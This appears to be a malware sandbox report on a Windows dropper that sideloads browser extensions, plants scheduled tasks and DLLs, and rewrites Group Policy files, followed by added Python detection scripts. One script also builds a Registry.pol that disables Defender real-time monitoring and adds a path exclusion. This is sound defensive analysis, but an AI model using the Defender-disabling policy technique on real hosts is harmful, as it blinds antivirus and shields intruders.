File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\manifest.json C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\SrIkAST.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\05DDC6AA91765AACACDB0A5F96DF8199 C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\SrIkAST.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\4FA45AE1010E09657982D8D28B3BD38E_97769FA94627046053C91C794A3C7311 C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\SrIkAST.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\4FA45AE1010E09657982D8D28B3BD38E_97769FA94627046053C91C794A3C7311 C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\SrIkAST.exe N/A
File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\SrIkAST.exe N/A
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\SrIkAST.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\05DDC6AA91765AACACDB0A5F96DF8199 C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\SrIkAST.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B3513D73A177A2707D910183759B389B_CD08734C3F770C014F2620E6CA4CE9C7 C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\SrIkAST.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol C:\Users\Admin\AppData\Local\Temp\alLGALgTRSblXywJD\nzjBlZvpbSzibxG\iWPKQQk.exe N/A
File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini C:\Users\Admin\AppData\Local\Temp\alLGALgTRSblXywJD\nzjBlZvpbSzibxG\iWPKQQk.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\SrIkAST.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\SrIkAST.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B3513D73A177A2707D910183759B389B_CD08734C3F770C014F2620E6CA4CE9C7 C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\SrIkAST.exe N/A
File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol C:\Users\Admin\AppData\Local\Temp\alLGALgTRSblXywJD\nzjBlZvpbSzibxG\iWPKQQk.exe N/A
File created C:\Windows\system32\GroupPolicy\gpt.ini C:\Users\Admin\AppData\Local\Temp\7zSEF5E.tmp\Install.exe N/A
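Besides the direct reg.exe writes, Install.exe, iWPKQQk.exe and SrIkAST.exe create or modify the local machine policy files Registry.pol and gpt.ini (rows above). Settings placed in Registry.pol are re-applied at every Group Policy refresh, so a Defender policy seeded there survives deletion of the registry value. The Python below is an added example, not sandbox tooling: it serialises and parses the documented PReg layout ("PReg", version 1, then UTF-16LE [key;value;type;size;data] records) and lists the entries under the Windows Defender policy root. The report does not show the file's contents; the entries are constructed to mirror the DisableRealtimeMonitoring value the sample set through reg.exe, plus a policy-style path exclusion and one unrelated setting.

```python
"""Parse a Group Policy Registry.pol and flag Windows Defender policy entries.

Added example, not part of the sandbox report. The report records the sample
creating and modifying C:\\Windows\\system32\\GroupPolicy\\Machine\\Registry.pol
and gpt.ini but does not show their contents; SAMPLE_ENTRIES below are
constructed. The layout follows the documented PReg format: "PReg" + version
1, then [key;value;type;size;data] records in UTF-16LE.
"""
import struct

PREG_HEADER = b"PReg" + struct.pack("<I", 1)
REG_SZ, REG_DWORD = 1, 4


def _u16(s: str) -> bytes:
    return s.encode("utf-16-le")


def _sz(s: str) -> bytes:
    """A string as stored in a .pol: UTF-16LE plus a two-byte terminator."""
    return _u16(s) + b"\x00\x00"


# Constructed entries: (key, value name, type, raw data bytes).
SAMPLE_ENTRIES = [
    (r"Software\Policies\Microsoft\Windows NT\Terminal Services",
     "fDenyTSConnections", REG_DWORD, struct.pack("<I", 1)),
    (r"Software\Policies\Microsoft\Windows Defender\Real-time Protection",
     "DisableRealtimeMonitoring", REG_DWORD, struct.pack("<I", 1)),
    (r"Software\Policies\Microsoft\Windows Defender\Exclusions\Paths",
     r"C:\ProgramData\eiYaNjTCbhfbMeVB", REG_SZ, _sz("0")),
]


def build_registry_pol(entries) -> bytes:
    out = bytearray(PREG_HEADER)
    for key, name, reg_type, data in entries:
        out += _u16("[") + _sz(key) + _u16(";") + _sz(name) + _u16(";")
        out += struct.pack("<I", reg_type) + _u16(";")
        out += struct.pack("<I", len(data)) + _u16(";") + data + _u16("]")
    return bytes(out)


def parse_registry_pol(blob: bytes) -> list:
    if blob[:8] != PREG_HEADER:
        raise ValueError("not a version-1 PReg file")

    def expect(pos, ch):
        if blob[pos:pos + 2] != _u16(ch):
            raise ValueError(f"expected {ch!r} at offset {pos}")
        return pos + 2

    def read_sz(pos):
        # Scan two bytes at a time: a byte-wise search for 00 00 would stop
        # inside an ASCII code unit such as 'a\x00' followed by '\x00'.
        end = pos
        while blob[end:end + 2] != b"\x00\x00":
            if end >= len(blob):
                raise ValueError("unterminated string")
            end += 2
        return blob[pos:end].decode("utf-16-le"), end + 2

    entries, pos = [], 8
    while pos < len(blob):
        pos = expect(pos, "[")
        key, pos = read_sz(pos)
        pos = expect(pos, ";")
        name, pos = read_sz(pos)
        pos = expect(pos, ";")
        reg_type, = struct.unpack_from("<I", blob, pos)
        pos = expect(pos + 4, ";")
        size, = struct.unpack_from("<I", blob, pos)
        pos = expect(pos + 4, ";")
        data = blob[pos:pos + size]
        pos = expect(pos + size, "]")
        entries.append((key, name, reg_type, data))
    return entries


def decode_data(reg_type: int, data: bytes):
    if reg_type == REG_DWORD and len(data) == 4:
        return struct.unpack("<I", data)[0]
    if reg_type == REG_SZ:
        return data.decode("utf-16-le").rstrip("\x00")
    return data.hex()


def find_defender_policies(entries) -> list:
    """Decoded entries under the Defender policy root. The special value names
    Group Policy uses for deletions (**DeleteKeys, **DeleteValues, **del.<name>)
    would show up here too and mean removal rather than setting."""
    root = r"software\policies\microsoft\windows defender"
    return [(key, name, decode_data(t, d)) for key, name, t, d in entries
            if key.lower() == root or key.lower().startswith(root + "\\")]


if __name__ == "__main__":
    blob = build_registry_pol(SAMPLE_ENTRIES)
    for key, name, value in find_defender_policies(parse_registry_pol(blob)):
        print(f"{key}\\{name} = {value!r}")
```

Against a live host, feed the real file with parse_registry_pol(open(r"C:\Windows\System32\GroupPolicy\Machine\Registry.pol", "rb").read()). Remediation means deleting the offending records (or the whole file if it is not otherwise used), raising the Version value in gpt.ini so the client re-reads the policy, and running gpupdate /force; the sample's own write to gpt.ini is consistent with that same requirement.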

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\SrIkAST.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\SrIkAST.exe N/A
File created C:\Program Files (x86)\YNUWFfCEdUiU2\eWqHNOqEACgsG.dll C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\SrIkAST.exe N/A
File created C:\Program Files (x86)\ZRxaODbjXejAAfVsBUR\GZdYLkX.xml C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\SrIkAST.exe N/A
File created C:\Program Files (x86)\LsajhStaXkJRC\oKUMcOv.dll C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\SrIkAST.exe N/A
File created C:\Program Files (x86)\QpigBxJgKxUn\hgzqaRK.dll C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\SrIkAST.exe N/A
File created C:\Program Files (x86)\oWxSecJNU\WHOECs.dll C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\SrIkAST.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\SrIkAST.exe N/A
File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\SrIkAST.exe N/A
File created C:\Program Files (x86)\oWxSecJNU\HhZjtHf.xml C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\SrIkAST.exe N/A
File created C:\Program Files (x86)\YNUWFfCEdUiU2\jVrfOkL.xml C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\SrIkAST.exe N/A
File created C:\Program Files (x86)\ZRxaODbjXejAAfVsBUR\bXCdNnQ.dll C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\SrIkAST.exe N/A
File created C:\Program Files (x86)\LsajhStaXkJRC\LvsQWsQ.xml C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\SrIkAST.exe N/A
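The Chrome extension manifest written by SrIkAST.exe (signature "Drops Chrome extension" above) and the .xpi dropped into Mozilla Firefox\browser\features together with a rewritten omni.ja and an omni.ja.bak copy are the browser-side payload. The Python below is an added example, not sandbox tooling: it scans a Chrome profile's Extensions folder and a Firefox install directory for exactly these artefacts. Because the report shows only paths, build_sample_tree() creates a throw-away tree whose manifest contents (permissions, names, the Firefox add-on ID) are invented; the Chrome extension ID and the .xpi file name are reused from the report.

```python
"""Hunt for sideloaded browser extensions of the kind this sample drops.

Added example, not part of the sandbox report. The report shows a Chrome
manifest.json under the profile's Extensions folder and a .xpi plus an
omni.ja backup under the Firefox install directory, but not their contents;
build_sample_tree() therefore writes invented manifests so the scanners can
run offline.
"""
import json
import tempfile
import zipfile
from pathlib import Path

# Permissions that let an extension read or rewrite traffic and sessions.
RISKY_PERMISSIONS = {"<all_urls>", "webRequest", "webRequestBlocking",
                     "declarativeNetRequest", "cookies", "nativeMessaging",
                     "history", "scripting", "tabs"}
WEBSTORE_UPDATE_URL = "https://clients2.google.com/service/update2/crx"


def scan_chrome_extensions(ext_root: Path) -> list:
    """One record per <id>/<version>/manifest.json under a Chrome profile."""
    records = []
    for manifest in sorted(ext_root.glob("*/*/manifest.json")):
        m = json.loads(manifest.read_text(encoding="utf-8"))
        perms = set(m.get("permissions", [])) | set(m.get("host_permissions", []))
        records.append({
            "id": manifest.parent.parent.name,
            "version": manifest.parent.name,
            "name": m.get("name"),
            "risky": sorted(p for p in perms if p in RISKY_PERMISSIONS or "*" in p),
            # Web Store installs carry Google's update URL; anything else was
            # unpacked or pushed by policy and deserves a look.
            "sideloaded": m.get("update_url") != WEBSTORE_UPDATE_URL,
        })
    return records


def scan_firefox_install(ff_root: Path) -> dict:
    """List system add-ons in browser\\features and any omni.ja leftovers."""
    addons = []
    for xpi in sorted((ff_root / "browser" / "features").glob("*.xpi")):
        with zipfile.ZipFile(xpi) as z:
            m = json.loads(z.read("manifest.json"))
        gecko = (m.get("browser_specific_settings") or m.get("applications") or {}).get("gecko", {})
        addon_id = gecko.get("id", "")
        addons.append({"file": xpi.name, "id": addon_id,
                       # Mozilla's own system add-ons use @mozilla.org IDs; this
                       # is a triage heuristic, not a substitute for signature checks.
                       "mozilla_id": addon_id.endswith("@mozilla.org")})
    leftovers = sorted(p.name for p in (ff_root / "browser").glob("omni.ja.*"))
    return {"addons": addons, "omni_ja_leftovers": leftovers}


def build_sample_tree(base: Path):
    """Constructed tree mirroring the paths in the report; contents invented."""
    ext = (base / "Chrome" / "User Data" / "Default" / "Extensions"
           / "gfcdbodapcbfckbfpmgeldfkkgjknceo" / "1.2.0_0")
    ext.mkdir(parents=True)
    (ext / "manifest.json").write_text(json.dumps({
        "manifest_version": 3, "name": "Sample Extension", "version": "1.2.0",
        "permissions": ["tabs", "webRequest", "scripting"],
        "host_permissions": ["<all_urls>"]}), encoding="utf-8")
    ff = base / "Mozilla Firefox"
    features = ff / "browser" / "features"
    features.mkdir(parents=True)
    with zipfile.ZipFile(features / "{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi", "w") as z:
        z.writestr("manifest.json", json.dumps({
            "manifest_version": 2, "name": "x", "version": "1.0",
            "browser_specific_settings": {"gecko": {"id": "{469DEDC5-791B-41B7-99CA-EB25B08298D1}"}}}))
    with zipfile.ZipFile(features / "webcompat@mozilla.org.xpi", "w") as z:
        z.writestr("manifest.json", json.dumps({
            "manifest_version": 2, "name": "Web Compat", "version": "1.0",
            "browser_specific_settings": {"gecko": {"id": "webcompat@mozilla.org"}}}))
    (ff / "browser" / "omni.ja").write_bytes(b"")
    (ff / "browser" / "omni.ja.bak").write_bytes(b"")
    return ext.parent.parent, ff


def demo() -> dict:
    """Build the sample tree in a temp dir, scan it and return the findings."""
    with tempfile.TemporaryDirectory() as tmp:
        ext_root, ff_root = build_sample_tree(Path(tmp))
        return {"chrome": scan_chrome_extensions(ext_root),
                "firefox": scan_firefox_install(ff_root)}


if __name__ == "__main__":
    print(json.dumps(demo(), indent=2))
```

On a live host point scan_chrome_extensions at %LOCALAPPDATA%\Google\Chrome\User Data\Default\Extensions and scan_firefox_install at C:\Program Files\Mozilla Firefox. An .xpi in browser\features without an @mozilla.org ID, or any omni.ja.* leftover, is reason enough to reinstall Firefox from a clean package rather than patch it in place; on the Chrome side also check the ExtensionInstallForcelist policy, which this scanner does not cover.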

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\FTlmQXMDCFpnewAuq.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\Tasks\zeLHdclAQOoTZxj.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\Tasks\dBpreMcpfXbehynYz.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\Tasks\bJbhxhmwQPPePEjnjA.job C:\Windows\SysWOW64\schtasks.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSEF5E.tmp\Install.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\alLGALgTRSblXywJD\nzjBlZvpbSzibxG\iWPKQQk.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\PL\setup.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSEDA9.tmp\Install.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language \??\c:\windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\SrIkAST.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Users\Admin\AppData\Local\Temp\7zSEF5E.tmp\Install.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Users\Admin\AppData\Local\Temp\7zSEF5E.tmp\Install.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Windows\SysWOW64\rundll32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Windows\SysWOW64\rundll32.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000004000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a7f006f000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\SrIkAST.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000003000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a7f006f000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 C:\Windows\SysWOW64\rundll32.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\SrIkAST.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\SrIkAST.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\SrIkAST.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\SrIkAST.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\SrIkAST.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\SrIkAST.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\SrIkAST.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\SrIkAST.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host\Settings C:\Windows\SysWOW64\wscript.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\SrIkAST.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\SrIkAST.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\SrIkAST.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\SrIkAST.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\3e-37-ac-c9-90-6b\WpadDecisionTime = 70ba22d21034db01 C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\SrIkAST.exe N/A
